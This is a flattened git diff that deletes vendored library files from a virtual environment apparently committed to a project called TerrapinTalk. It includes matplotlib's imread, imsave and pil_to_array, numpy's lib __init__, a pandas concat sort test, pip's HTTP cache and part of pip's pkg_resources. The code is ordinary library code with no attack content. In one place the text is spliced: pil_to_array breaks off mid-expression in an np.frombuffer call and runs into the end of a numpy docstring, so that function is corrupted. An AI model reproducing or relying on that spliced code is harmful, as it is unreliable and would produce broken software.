self.get_figure()._get_renderer() - - if isinstance(self.bbox, BboxBase): - return self.bbox - elif callable(self.bbox): - return self.bbox(renderer) - else: - raise ValueError("Unknown type of bbox") - - def contains(self, mouseevent): - """Test whether the mouse event occurred within the image.""" - if self._different_canvas(mouseevent) or not self.get_visible(): - return False, {} - x, y = mouseevent.x, mouseevent.y - inside = self.get_window_extent().contains(x, y) - return inside, {} - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - width, height = renderer.get_canvas_width_height() - bbox_in = self.get_window_extent(renderer).frozen() - bbox_in._points /= [width, height] - bbox_out = self.get_window_extent(renderer) - clip = Bbox([[0, 0], [width, height]]) - self._transform = BboxTransformTo(clip) - return self._make_image( - self._A, - bbox_in, bbox_out, clip, magnification, unsampled=unsampled) - - -def imread(fname, format=None): - """ - Read an image from a file into an array. - - .. note:: - - This function exists for historical reasons. It is recommended to - use `PIL.Image.open` instead for loading images. - - Parameters - ---------- - fname : str or file-like - The image file to read: a filename, a URL or a file-like object opened - in read-binary mode. - - Passing a URL is deprecated. Please open the URL - for reading and pass the result to Pillow, e.g. with - ``np.array(PIL.Image.open(urllib.request.urlopen(url)))``. - format : str, optional - The image file format assumed for reading the data. The image is - loaded as a PNG file if *format* is set to "png", if *fname* is a path - or opened file with a ".png" extension, or if it is a URL. In all - other cases, *format* is ignored and the format is auto-detected by - `PIL.Image.open`. - - Returns - ------- - `numpy.array` - The image data. The returned array has shape - - - (M, N) for grayscale images. - - (M, N, 3) for RGB images. - - (M, N, 4) for RGBA images. - - PNG images are returned as float arrays (0-1). All other formats are - returned as int arrays, with a bit depth determined by the file's - contents. - """ - # hide imports to speed initial import on systems with slow linkers - from urllib import parse - - if format is None: - if isinstance(fname, str): - parsed = parse.urlparse(fname) - # If the string is a URL (Windows paths appear as if they have a - # length-1 scheme), assume png. - if len(parsed.scheme) > 1: - ext = 'png' - else: - ext = Path(fname).suffix.lower()[1:] - elif hasattr(fname, 'geturl'): # Returned by urlopen(). - # We could try to parse the url's path and use the extension, but - # returning png is consistent with the block above. Note that this - # if clause has to come before checking for fname.name as - # urlopen("file:///...") also has a name attribute (with the fixed - # value ""). - ext = 'png' - elif hasattr(fname, 'name'): - ext = Path(fname.name).suffix.lower()[1:] - else: - ext = 'png' - else: - ext = format - img_open = ( - PIL.PngImagePlugin.PngImageFile if ext == 'png' else PIL.Image.open) - if isinstance(fname, str) and len(parse.urlparse(fname).scheme) > 1: - # Pillow doesn't handle URLs directly. - raise ValueError( - "Please open the URL for reading and pass the " - "result to Pillow, e.g. with " - "``np.array(PIL.Image.open(urllib.request.urlopen(url)))``." - ) - with img_open(fname) as image: - return (_pil_png_to_float_array(image) - if isinstance(image, PIL.PngImagePlugin.PngImageFile) else - pil_to_array(image)) - - -def imsave(fname, arr, vmin=None, vmax=None, cmap=None, format=None, - origin=None, dpi=100, *, metadata=None, pil_kwargs=None): - """ - Colormap and save an array as an image file. - - RGB(A) images are passed through. Single channel images will be - colormapped according to *cmap* and *norm*. - - .. note:: - - If you want to save a single channel image as gray scale please use an - image I/O library (such as pillow, tifffile, or imageio) directly. - - Parameters - ---------- - fname : str or path-like or file-like - A path or a file-like object to store the image in. - If *format* is not set, then the output format is inferred from the - extension of *fname*, if any, and from :rc:`savefig.format` otherwise. - If *format* is set, it determines the output format. - arr : array-like - The image data. The shape can be one of - MxN (luminance), MxNx3 (RGB) or MxNx4 (RGBA). - vmin, vmax : float, optional - *vmin* and *vmax* set the color scaling for the image by fixing the - values that map to the colormap color limits. If either *vmin* - or *vmax* is None, that limit is determined from the *arr* - min/max value. - cmap : str or `~matplotlib.colors.Colormap`, default: :rc:`image.cmap` - A Colormap instance or registered colormap name. The colormap - maps scalar data to colors. It is ignored for RGB(A) data. - format : str, optional - The file format, e.g. 'png', 'pdf', 'svg', ... The behavior when this - is unset is documented under *fname*. - origin : {'upper', 'lower'}, default: :rc:`image.origin` - Indicates whether the ``(0, 0)`` index of the array is in the upper - left or lower left corner of the axes. - dpi : float - The DPI to store in the metadata of the file. This does not affect the - resolution of the output image. Depending on file format, this may be - rounded to the nearest integer. - metadata : dict, optional - Metadata in the image file. The supported keys depend on the output - format, see the documentation of the respective backends for more - information. - Currently only supported for "png", "pdf", "ps", "eps", and "svg". - pil_kwargs : dict, optional - Keyword arguments passed to `PIL.Image.Image.save`. If the 'pnginfo' - key is present, it completely overrides *metadata*, including the - default 'Software' key. - """ - from matplotlib.figure import Figure - if isinstance(fname, os.PathLike): - fname = os.fspath(fname) - if format is None: - format = (Path(fname).suffix[1:] if isinstance(fname, str) - else mpl.rcParams["savefig.format"]).lower() - if format in ["pdf", "ps", "eps", "svg"]: - # Vector formats that are not handled by PIL. - if pil_kwargs is not None: - raise ValueError( - f"Cannot use 'pil_kwargs' when saving to {format}") - fig = Figure(dpi=dpi, frameon=False) - fig.figimage(arr, cmap=cmap, vmin=vmin, vmax=vmax, origin=origin, - resize=True) - fig.savefig(fname, dpi=dpi, format=format, transparent=True, - metadata=metadata) - else: - # Don't bother creating an image; this avoids rounding errors on the - # size when dividing and then multiplying by dpi. - if origin is None: - origin = mpl.rcParams["image.origin"] - else: - _api.check_in_list(('upper', 'lower'), origin=origin) - if origin == "lower": - arr = arr[::-1] - if (isinstance(arr, memoryview) and arr.format == "B" - and arr.ndim == 3 and arr.shape[-1] == 4): - # Such an ``arr`` would also be handled fine by sm.to_rgba below - # (after casting with asarray), but it is useful to special-case it - # because that's what backend_agg passes, and can be in fact used - # as is, saving a few operations. - rgba = arr - else: - sm = cm.ScalarMappable(cmap=cmap) - sm.set_clim(vmin, vmax) - rgba = sm.to_rgba(arr, bytes=True) - if pil_kwargs is None: - pil_kwargs = {} - else: - # we modify this below, so make a copy (don't modify caller's dict) - pil_kwargs = pil_kwargs.copy() - pil_shape = (rgba.shape[1], rgba.shape[0]) - image = PIL.Image.frombuffer( - "RGBA", pil_shape, rgba, "raw", "RGBA", 0, 1) - if format == "png": - # Only use the metadata kwarg if pnginfo is not set, because the - # semantics of duplicate keys in pnginfo is unclear. - if "pnginfo" in pil_kwargs: - if metadata: - _api.warn_external("'metadata' is overridden by the " - "'pnginfo' entry in 'pil_kwargs'.") - else: - metadata = { - "Software": (f"Matplotlib version{mpl.__version__}, " - f"https://matplotlib.org/"), - **(metadata if metadata is not None else {}), - } - pil_kwargs["pnginfo"] = pnginfo = PIL.PngImagePlugin.PngInfo() - for k, v in metadata.items(): - if v is not None: - pnginfo.add_text(k, v) - elif metadata is not None: - raise ValueError(f"metadata not supported for format {format!r}") - if format in ["jpg", "jpeg"]: - format = "jpeg" # Pillow doesn't recognize "jpg". - facecolor = mpl.rcParams["savefig.facecolor"] - if cbook._str_equal(facecolor, "auto"): - facecolor = mpl.rcParams["figure.facecolor"] - color = tuple(int(x * 255) for x in mcolors.to_rgb(facecolor)) - background = PIL.Image.new("RGB", pil_shape, color) - background.paste(image, image) - image = background - pil_kwargs.setdefault("format", format) - pil_kwargs.setdefault("dpi", (dpi, dpi)) - image.save(fname, **pil_kwargs) - - -def pil_to_array(pilImage): - """ - Load a `PIL image`_ and return it as a numpy int array. - - .. _PIL image: https://pillow.readthedocs.io/en/latest/reference/Image.html - - Returns - ------- - numpy.array - - The array shape depends on the image type: - - - (M, N) for grayscale images. - - (M, N, 3) for RGB images. - - (M, N, 4) for RGBA images. - """ - if pilImage.mode in ['RGBA', 'RGBX', 'RGB', 'L']: - # return MxNx4 RGBA, MxNx3 RBA, or MxN luminance array - return np.asarray(pilImage) - elif pilImage.mode.startswith('I;16'): - # return MxN luminance array of uint16 - raw = pilImage.tobytes('raw', pilImage.mode) - if pilImage.mode.endswith('B'): - x = np.frombuffer(raw, '>u2') - else: - x = np.frombuffer(raw, '`` where possible. - -``numpy.lib`` is mostly a space for implementing functions that don't -belong in core or in another NumPy submodule with a clear purpose -(e.g. ``random``, ``fft``, ``linalg``, ``ma``). - -Most contains basic functions that are used by several submodules and are -useful to have in the main name-space. - -""" - -# Public submodules -# Note: recfunctions and (maybe) format are public too, but not imported -from . import mixins -from . import scimath as emath - -# Private submodules -# load module names. See https://github.com/networkx/networkx/issues/5838 -from . import type_check -from . import index_tricks -from . import function_base -from . import nanfunctions -from . import shape_base -from . import stride_tricks -from . import twodim_base -from . import ufunclike -from . import histograms -from . import polynomial -from . import utils -from . import arraysetops -from . import npyio -from . import arrayterator -from . import arraypad -from . import _version - -from .type_check import * -from .index_tricks import * -from .function_base import * -from .nanfunctions import * -from .shape_base import * -from .stride_tricks import * -from .twodim_base import * -from .ufunclike import * -from .histograms import * - -from .polynomial import * -from .utils import * -from .arraysetops import * -from .npyio import * -from .arrayterator import Arrayterator -from .arraypad import * -from ._version import * -from numpy.core._multiarray_umath import tracemalloc_domain - -__all__ = ['emath', 'tracemalloc_domain', 'Arrayterator'] -__all__ += type_check.__all__ -__all__ += index_tricks.__all__ -__all__ += function_base.__all__ -__all__ += shape_base.__all__ -__all__ += stride_tricks.__all__ -__all__ += twodim_base.__all__ -__all__ += ufunclike.__all__ -__all__ += arraypad.__all__ -__all__ += polynomial.__all__ -__all__ += utils.__all__ -__all__ += arraysetops.__all__ -__all__ += npyio.__all__ -__all__ += nanfunctions.__all__ -__all__ += histograms.__all__ - -from numpy._pytesttester import PytestTester -test = PytestTester(__name__) -del PytestTester - -def __getattr__(attr): - # Warn for reprecated attributes - import math - import warnings - - if attr == 'math': - warnings.warn( - "`np.lib.math` is a deprecated alias for the standard library " - "`math` module (Deprecated Numpy 1.25). Replace usages of " - "`numpy.lib.math` with `math`", DeprecationWarning, stacklevel=2) - return math - else: - raise AttributeError("module {!r} has no attribute " - "{!r}".format(__name__, attr)) - diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/reshape/concat/test_sort.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/reshape/concat/test_sort.py deleted file mode 100644 index 2724f819588933cc307dd396fdcd024f04c38eaa..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/reshape/concat/test_sort.py +++ /dev/null @@ -1,118 +0,0 @@ -import numpy as np -import pytest - -import pandas as pd -from pandas import DataFrame -import pandas._testing as tm - - -class TestConcatSort: - def test_concat_sorts_columns(self, sort): - # GH-4588 - df1 = DataFrame({"a": [1, 2], "b": [1, 2]}, columns=["b", "a"]) - df2 = DataFrame({"a": [3, 4], "c": [5, 6]}) - - # for sort=True/None - expected = DataFrame( - {"a": [1, 2, 3, 4], "b": [1, 2, None, None], "c": [None, None, 5, 6]}, - columns=["a", "b", "c"], - ) - - if sort is False: - expected = expected[["b", "a", "c"]] - - # default - with tm.assert_produces_warning(None): - result = pd.concat([df1, df2], ignore_index=True, sort=sort) - tm.assert_frame_equal(result, expected) - - def test_concat_sorts_index(self, sort): - df1 = DataFrame({"a": [1, 2, 3]}, index=["c", "a", "b"]) - df2 = DataFrame({"b": [1, 2]}, index=["a", "b"]) - - # For True/None - expected = DataFrame( - {"a": [2, 3, 1], "b": [1, 2, None]}, - index=["a", "b", "c"], - columns=["a", "b"], - ) - if sort is False: - expected = expected.loc[["c", "a", "b"]] - - # Warn and sort by default - with tm.assert_produces_warning(None): - result = pd.concat([df1, df2], axis=1, sort=sort) - tm.assert_frame_equal(result, expected) - - def test_concat_inner_sort(self, sort): - # https://github.com/pandas-dev/pandas/pull/20613 - df1 = DataFrame( - {"a": [1, 2], "b": [1, 2], "c": [1, 2]}, columns=["b", "a", "c"] - ) - df2 = DataFrame({"a": [1, 2], "b": [3, 4]}, index=[3, 4]) - - with tm.assert_produces_warning(None): - # unset sort should *not* warn for inner join - # since that never sorted - result = pd.concat([df1, df2], sort=sort, join="inner", ignore_index=True) - - expected = DataFrame({"b": [1, 2, 3, 4], "a": [1, 2, 1, 2]}, columns=["b", "a"]) - if sort is True: - expected = expected[["a", "b"]] - tm.assert_frame_equal(result, expected) - - def test_concat_aligned_sort(self): - # GH-4588 - df = DataFrame({"c": [1, 2], "b": [3, 4], "a": [5, 6]}, columns=["c", "b", "a"]) - result = pd.concat([df, df], sort=True, ignore_index=True) - expected = DataFrame( - {"a": [5, 6, 5, 6], "b": [3, 4, 3, 4], "c": [1, 2, 1, 2]}, - columns=["a", "b", "c"], - ) - tm.assert_frame_equal(result, expected) - - result = pd.concat( - [df, df[["c", "b"]]], join="inner", sort=True, ignore_index=True - ) - expected = expected[["b", "c"]] - tm.assert_frame_equal(result, expected) - - def test_concat_aligned_sort_does_not_raise(self): - # GH-4588 - # We catch TypeErrors from sorting internally and do not re-raise. - df = DataFrame({1: [1, 2], "a": [3, 4]}, columns=[1, "a"]) - expected = DataFrame({1: [1, 2, 1, 2], "a": [3, 4, 3, 4]}, columns=[1, "a"]) - result = pd.concat([df, df], ignore_index=True, sort=True) - tm.assert_frame_equal(result, expected) - - def test_concat_frame_with_sort_false(self): - # GH 43375 - result = pd.concat( - [DataFrame({i: i}, index=[i]) for i in range(2, 0, -1)], sort=False - ) - expected = DataFrame([[2, np.nan], [np.nan, 1]], index=[2, 1], columns=[2, 1]) - - tm.assert_frame_equal(result, expected) - - # GH 37937 - df1 = DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]}, index=[1, 2, 3]) - df2 = DataFrame({"c": [7, 8, 9], "d": [10, 11, 12]}, index=[3, 1, 6]) - result = pd.concat([df2, df1], axis=1, sort=False) - expected = DataFrame( - [ - [7.0, 10.0, 3.0, 6.0], - [8.0, 11.0, 1.0, 4.0], - [9.0, 12.0, np.nan, np.nan], - [np.nan, np.nan, 2.0, 5.0], - ], - index=[3, 1, 6, 2], - columns=["c", "d", "a", "b"], - ) - tm.assert_frame_equal(result, expected) - - def test_concat_sort_none_raises(self): - # GH#41518 - df = DataFrame({1: [1, 2], "a": [3, 4]}) - msg = "The 'sort' keyword only accepts boolean values; None was passed." - with pytest.raises(ValueError, match=msg): - pd.concat([df, df], sort=None) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/network/cache.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/network/cache.py deleted file mode 100644 index 9dba7edf9cd34f5cc881fee9b08c674d2999c3da..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/network/cache.py +++ /dev/null @@ -1,69 +0,0 @@ -"""HTTP cache implementation. -""" - -import os -from contextlib import contextmanager -from typing import Iterator, Optional - -from pip._vendor.cachecontrol.cache import BaseCache -from pip._vendor.cachecontrol.caches import FileCache -from pip._vendor.requests.models import Response - -from pip._internal.utils.filesystem import adjacent_tmp_file, replace -from pip._internal.utils.misc import ensure_dir - - -def is_from_cache(response: Response) -> bool: - return getattr(response, "from_cache", False) - - -@contextmanager -def suppressed_cache_errors() -> Iterator[None]: - """If we can't access the cache then we can just skip caching and process - requests as if caching wasn't enabled. - """ - try: - yield - except OSError: - pass - - -class SafeFileCache(BaseCache): - """ - A file based cache which is safe to use even when the target directory may - not be accessible or writable. - """ - - def __init__(self, directory: str) -> None: - assert directory is not None, "Cache directory must not be None." - super().__init__() - self.directory = directory - - def _get_cache_path(self, name: str) -> str: - # From cachecontrol.caches.file_cache.FileCache._fn, brought into our - # class for backwards-compatibility and to avoid using a non-public - # method. - hashed = FileCache.encode(name) - parts = list(hashed[:5]) + [hashed] - return os.path.join(self.directory, *parts) - - def get(self, key: str) -> Optional[bytes]: - path = self._get_cache_path(key) - with suppressed_cache_errors(): - with open(path, "rb") as f: - return f.read() - - def set(self, key: str, value: bytes, expires: Optional[int] = None) -> None: - path = self._get_cache_path(key) - with suppressed_cache_errors(): - ensure_dir(os.path.dirname(path)) - - with adjacent_tmp_file(path) as f: - f.write(value) - - replace(f.name, path) - - def delete(self, key: str) -> None: - path = self._get_cache_path(key) - with suppressed_cache_errors(): - os.remove(path) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/pkg_resources/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/pkg_resources/__init__.py deleted file mode 100644 index 4cd562cf94c6d16f6b2b49b38549db9b914a6178..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/pkg_resources/__init__.py +++ /dev/null @@ -1,3296 +0,0 @@ -# coding: utf-8 -""" -Package resource API --------------------- - -A resource is a logical file contained within a package, or a logical -subdirectory thereof. The package resource API expects resource names -to have their path parts separated with ``/``, *not* whatever the local -path separator is. Do not use os.path operations to manipulate resource -names being passed into the API. - -The package resource API is designed to work with normal filesystem packages, -.egg files, and unpacked .egg files. It can also work in a limited way with -.zip files and with custom PEP 302 loaders that support the ``get_data()`` -method. -""" - -from __future__ import absolute_import - -import sys -import os -import io -import time -import re -import types -import zipfile -import zipimport -import warnings -import stat -import functools -import pkgutil -import operator -import platform -import collections -import plistlib -import email.parser -import errno -import tempfile -import textwrap -import itertools -import inspect -import ntpath -import posixpath -from pkgutil import get_importer - -try: - import _imp -except ImportError: - # Python 3.2 compatibility - import imp as _imp - -try: - FileExistsError -except NameError: - FileExistsError = OSError - -from pip._vendor import six -from pip._vendor.six.moves import urllib, map, filter - -# capture these to bypass sandboxing -from os import utime -try: - from os import mkdir, rename, unlink - WRITE_SUPPORT = True -except ImportError: - # no write support, probably under GAE - WRITE_SUPPORT = False - -from os import open as os_open -from os.path import isdir, split - -try: - import importlib.machinery as importlib_machinery - # access attribute to force import under delayed import mechanisms. - importlib_machinery.__name__ -except ImportError: - importlib_machinery = None - -from . import py31compat -from pip._vendor import platformdirs -from pip._vendor import packaging -__import__('pip._vendor.packaging.version') -__import__('pip._vendor.packaging.specifiers') -__import__('pip._vendor.packaging.requirements') -__import__('pip._vendor.packaging.markers') - - -__metaclass__ = type - - -if (3, 0) < sys.version_info < (3, 5): - raise RuntimeError("Python 3.5 or later is required") - -if six.PY2: - # Those builtin exceptions are only defined in Python 3 - PermissionError = None - NotADirectoryError = None - -# declare some globals that will be defined later to -# satisfy the linters. -require = None -working_set = None -add_activation_listener = None -resources_stream = None -cleanup_resources = None -resource_dir = None -resource_stream = None -set_extraction_path = None -resource_isdir = None -resource_string = None -iter_entry_points = None -resource_listdir = None -resource_filename = None -resource_exists = None -_distribution_finders = None -_namespace_handlers = None -_namespace_packages = None - - -class PEP440Warning(RuntimeWarning): - """ - Used when there is an issue with a version or specifier not complying with - PEP 440. - """ - - -def parse_version(v): - try: - return packaging.version.Version(v) - except packaging.version.InvalidVersion: - return packaging.version.LegacyVersion(v) - - -_state_vars = {} - - -def _declare_state(vartype, **kw): - globals().update(kw) - _state_vars.update(dict.fromkeys(kw, vartype)) - - -def __getstate__(): - state = {} - g = globals() - for k, v in _state_vars.items(): - state[k] = g['_sget_' + v](g[k]) - return state - - -def __setstate__(state): - g = globals() - for k, v in state.items(): - g['_sset_' + _state_vars[k]](k, g[k], v) - return state - - -def _sget_dict(val): - return val.copy() - - -def _sset_dict(key, ob, state): - ob.clear() - ob.update(state) - - -def _sget_object(val): - return val.__getstate__() - - -def _sset_object(key, ob, state): - ob.__setstate__(state) - - -_sget_none = _sset_none = lambda *args: None - - -def get_supported_platform(): - """Return this platform's maximum compatible version. - - distutils.util.get_platform() normally reports the minimum version - of Mac OS X that would be required to *use* extensions produced by - distutils. But what we want when checking compatibility is to know the - version of Mac OS X that we are *running*. To allow usage of packages that - explicitly require a newer version of Mac OS X, we must also know the - current version of the OS. - - If this condition occurs for any other platform with a version in its - platform strings, this function should be extended accordingly. - """ - plat = get_build_platform() - m = macosVersionString.match(plat) - if m is not None and sys.platform == "darwin": - try: - plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3)) - except ValueError: - # not Mac OS X - pass - return plat - - -__all__ = [ - # Basic resource access and distribution/entry point discovery - 'require', 'run_script', 'get_provider', 'get_distribution', - 'load_entry_point', 'get_entry_map', 'get_entry_info', - 'iter_entry_points', - 'resource_string', 'resource_stream', 'resource_filename', - 'resource_listdir', 'resource_exists', 'resource_isdir', - - # Environmental control - 'declare_namespace', 'working_set', 'add_activation_listener', - 'find_distributions', 'set_extraction_path', 'cleanup_resources', - 'get_default_cache', - - # Primary implementation classes - 'Environment', 'WorkingSet', 'ResourceManager', - 'Distribution', 'Requirement', 'EntryPoint', - - # Exceptions - 'ResolutionError', 'VersionConflict', 'DistributionNotFound', - 'UnknownExtra', 'ExtractionError', - - # Warnings - 'PEP440Warning', - - # Parsing functions and string utilities - 'parse_requirements', 'parse_version', 'safe_name', 'safe_version', - 'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections', - 'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker', - - # filesystem utilities - 'ensure_directory', 'normalize_path', - - # Distribution "precedence" constants - 'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST', - - # "Provider" interfaces, implementations, and registration/lookup APIs - 'IMetadataProvider', 'IResourceProvider', 'FileMetadata', - 'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider', - 'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider', - 'register_finder', 'register_namespace_handler', 'register_loader_type', - 'fixup_namespace_packages', 'get_importer', - - # Warnings - 'PkgResourcesDeprecationWarning', - - # Deprecated/backward compatibility only - 'run_main', 'AvailableDistributions', -] - - -class ResolutionError(Exception): - """Abstract base for dependency resolution errors""" - - def __repr__(self): - return self.__class__.__name__ + repr(self.args) - - -class VersionConflict(ResolutionError): - """ - An already-installed version conflicts with the requested version. - - Should be initialized with the installed Distribution and the requested - Requirement. - """ - - _template = "{self.dist} is installed but {self.req} is required" - - @property - def dist(self): - return self.args[0] - - @property - def req(self): - return self.args[1] - - def report(self): - return self._template.format(**locals()) - - def with_context(self, required_by): - """ - If required_by is non-empty, return a version of self that is a - ContextualVersionConflict. - """ - if not required_by: - return self - args = self.args + (required_by,) - return ContextualVersionConflict(*args) - - -class ContextualVersionConflict(VersionConflict): - """ - A VersionConflict that accepts a third parameter, the set of the - requirements that required the installed Distribution. - """ - - _template = VersionConflict._template + ' by {self.required_by}' - - @property - def required_by(self): - return self.args[2] - - -class DistributionNotFound(ResolutionError): - """A requested distribution was not found""" - - _template = ("The '{self.req}' distribution was not found " - "and is required by {self.requirers_str}") - - @property - def req(self): - return self.args[0] - - @property - def requirers(self): - return self.args[1] - - @property - def requirers_str(self): - if not self.requirers: - return 'the application' - return ', '.join(self.requirers) - - def report(self): - return self._template.format(**locals()) - - def __str__(self): - return self.report() - - -class UnknownExtra(ResolutionError): - """Distribution doesn't have an "extra feature" of the given name""" - - -_provider_factories = {} - -PY_MAJOR = '{}.{}'.format(*sys.version_info) -EGG_DIST = 3 -BINARY_DIST = 2 -SOURCE_DIST = 1 -CHECKOUT_DIST = 0 -DEVELOP_DIST = -1 - - -def register_loader_type(loader_type, provider_factory): - """Register `provider_factory` to make providers for `loader_type` - - `loader_type` is the type or class of a PEP 302 ``module.__loader__``, - and `provider_factory` is a function that, passed a *module* object, - returns an ``IResourceProvider`` for that module. - """ - _provider_factories[loader_type] = provider_factory - - -def get_provider(moduleOrReq): - """Return an IResourceProvider for the named module or requirement""" - if isinstance(moduleOrReq, Requirement): - return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0] - try: - module = sys.modules[moduleOrReq] - except KeyError: - __import__(moduleOrReq) - module = sys.modules[moduleOrReq] - loader = getattr(module, '__loader__', None) - return _find_adapter(_provider_factories, loader)(module) - - -def _macosx_vers(_cache=[]): - if not _cache: - version = platform.mac_ver()[0] - # fallback for MacPorts - if version == '': - plist = '/System/Library/CoreServices/SystemVersion.plist' - if os.path.exists(plist): - if hasattr(plistlib, 'readPlist'): - plist_content = plistlib.readPlist(plist) - if 'ProductVersion' in plist_content: - version = plist_content['ProductVersion'] - - _cache.append(version.split('.')) - return _cache[0] - - -def _macosx_arch(machine): - return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine) - - -def get_build_platform(): - """Return this platform's string for platform-specific distributions - - XXX Currently this is the same as ``distutils.util.get_platform()``, but it - needs some hacks for Linux and Mac OS X. - """ - from sysconfig import get_platform - - plat = get_platform() - if sys.platform == "darwin" and not plat.startswith('macosx-'): - try: - version = _macosx_vers() - machine = os.uname()[4].replace(" ", "_") - return "macosx-%d.%d-%s" % ( - int(version[0]), int(version[1]), - _macosx_arch(machine), - ) - except ValueError: - # if someone is running a non-Mac darwin system, this will fall - # through to the default implementation - pass - return plat - - -macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)") -darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)") -# XXX backward compat -get_platform = get_build_platform - - -def compatible_platforms(provided, required): - """Can code for the `provided` platform run on the `required` platform? - - Returns true if either platform is ``None``, or the platforms are equal. - - XXX Needs compatibility checks for Linux and other unixy OSes. - """ - if provided is None or required is None or provided == required: - # easy case - return True - - # Mac OS X special cases - reqMac = macosVersionString.match(required) - if reqMac: - provMac = macosVersionString.match(provided) - - # is this a Mac package? - if not provMac: - # this is backwards compatibility for packages built before - # setuptools 0.6. All packages built after this point will - # use the new macosx designation. - provDarwin = darwinVersionString.match(provided) - if provDarwin: - dversion = int(provDarwin.group(1)) - macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2)) - if dversion == 7 and macosversion >= "10.3" or \ - dversion == 8 and macosversion >= "10.4": - return True - # egg isn't macosx or legacy darwin - return False - - # are they the same major version and machine type? - if provMac.group(1) != reqMac.group(1) or \ - provMac.group(3) != reqMac.group(3): - return False - - # is the required OS major update >= the provided one? - if int(provMac.group(2)) > int(reqMac.group(2)): - return False - - return True - - # XXX Linux and other platforms' special cases should go here - return False - - -def run_script(dist_spec, script_name): - """Locate distribution `dist_spec` and run its `script_name` script""" - ns = sys._getframe(1).f_globals - name = ns['__name__'] - ns.clear() - ns['__name__'] = name - require(dist_spec)[0].run_script(script_name, ns) - - -# backward compatibility -run_main = run_script - - -def get_distribution(dist): - """Return a current distribution object for a Requirement or string""" - if isinstance(dist, six.string_types): - dist = Requirement.parse(dist) - if isinstance(dist, Requirement): - dist = get_provider(dist) - if not isinstance(dist, Distribution): - raise TypeError("Expected string, Requirement, or Distribution", dist) - return dist - - -def load_entry_point(dist, group, name): - """Return `name` entry point of `group` for `dist` or raise ImportError""" - return get_distribution(dist).load_entry_point(group, name) - - -def get_entry_map(dist, group=None): - """Return the entry point map for `group`, or the full entry map""" - return get_distribution(dist).get_entry_map(group) - - -def get_entry_info(dist, group, name): - """Return the EntryPoint object for `group`+`name`, or ``None``""" - return get_distribution(dist).get_entry_info(group, name) - - -class IMetadataProvider: - def has_metadata(name): - """Does the package's distribution contain the named metadata?""" - - def get_metadata(name): - """The named metadata resource as a string""" - - def get_metadata_lines(name): - """Yield named metadata resource as list of non-blank non-comment lines - - Leading and trailing whitespace is stripped from each line, and lines - with ``#`` as the first non-blank character are omitted.""" - - def metadata_isdir(name): - """Is the named metadata a directory? (like ``os.path.isdir()``)""" - - def metadata_listdir(name): - """List of metadata names in the directory (like ``os.listdir()``)""" - - def run_script(script_name, namespace): - """Execute the named script in the supplied namespace dictionary""" - - -class IResourceProvider(IMetadataProvider): - """An object that provides access to package resources""" - - def get_resource_filename(manager, resource_name): - """Return a true filesystem path for `resource_name` - - `manager` must be an ``IResourceManager``""" - - def get_resource_stream(manager, resource_name): - """Return a readable file-like object for `resource_name` - - `manager` must be an ``IResourceManager``""" - - def get_resource_string(manager, resource_name): - """Return a string containing the contents of `resource_name` - - `manager` must be an ``IResourceManager``""" - - def has_resource(resource_name): - """Does the package contain the named resource?""" - - def resource_isdir(resource_name): - """Is the named resource a directory? (like ``os.path.isdir()``)""" - - def resource_listdir(resource_name): - """List of resource names in the directory (like ``os.listdir()``)""" - - -class WorkingSet: - """A collection of active distributions on sys.path (or a similar list)""" - - def __init__(self, entries=None): - """Create working set from list of path entries (default=sys.path)""" - self.entries = [] - self.entry_keys = {} - self.by_key = {} - self.callbacks = [] - - if entries is None: - entries = sys.path - - for entry in entries: - self.add_entry(entry) - - @classmethod - def _build_master(cls): - """ - Prepare the master working set. - """ - ws = cls() - try: - from __main__ import __requires__ - except ImportError: - # The main program does not list any requirements - return ws - - # ensure the requirements are met - try: - ws.require(__requires__) - except VersionConflict: - return cls._build_from_requirements(__requires__) - - return ws - - @classmethod - def _build_from_requirements(cls, req_spec): - """ - Build a working set from a requirement spec. Rewrites sys.path. - """ - # try it without defaults already on sys.path - # by starting with an empty path - ws = cls([]) - reqs = parse_requirements(req_spec) - dists = ws.resolve(reqs, Environment()) - for dist in dists: - ws.add(dist) - - # add any missing entries from sys.path - for entry in sys.path: - if entry not in ws.entries: - ws.add_entry(entry) - - # then copy back to sys.path - sys.path[:] = ws.entries - return ws - - def add_entry(self, entry): - """Add a path item to ``.entries``, finding any distributions on it - - ``find_distributions(entry, True)`` is used to find distributions - corresponding to the path entry, and they are added. `entry` is - always appended to ``.entries``, even if it is already present. - (This is because ``sys.path`` can contain the same value more than - once, and the ``.entries`` of the ``sys.path`` WorkingSet should always - equal ``sys.path``.) - """ - self.entry_keys.setdefault(entry, []) - self.entries.append(entry) - for dist in find_distributions(entry, True): - self.add(dist, entry, False) - - def __contains__(self, dist): - """True if `dist` is the active distribution for its project""" - return self.by_key.get(dist.key) == dist - - def find(self, req): - """Find a distribution matching requirement `req` - - If there is an active distribution for the requested project, this - returns it as long as it meets the version requirement specified by - `req`. But, if there is an active distribution for the project and it - does *not* meet the `req` requirement, ``VersionConflict`` is raised. - If there is no active distribution for the requested project, ``None`` - is 